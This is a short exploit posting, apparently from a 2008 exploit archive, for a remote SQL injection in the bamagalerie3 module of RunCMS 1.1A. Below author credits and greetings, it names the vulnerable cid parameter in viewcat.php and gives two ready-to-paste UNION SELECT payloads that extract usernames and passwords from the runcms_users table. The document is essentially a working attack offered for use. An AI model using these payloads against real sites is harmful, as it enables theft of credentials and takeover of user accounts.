[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability
# Published : 2008-04-01
# Author : DreamTurk
# Previous Title : phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability
# Next Title : Wordpress Plugin Download (dl_id) SQL Injection Vulnerability


[~] RUNCMS 1.1A : bamagalerie3 Module Remote SQL Injection's (cid)
[~]
[~] Script Page : http://runcms.org/
[~] ----------------------------------------------------------
[~]
[~] AUTHOR : DreamTurk
[~] Exploit coded and founded by DreamTurk :)
[~]
[~]
[~] dream@dr3amturk.org
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-Cr@zy_King :)
[~]
[~]
[~]
[~]| Cr@zy_King |  X-c0d3r |
[~]
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] modules/bamagalerie3/viewcat.php?id=31&cid=Sql
[~]
[~] Sql 1 :
[~] -99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
[~] Sql 2 :
[~] -99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

# www.Syue.com [2008-04-01]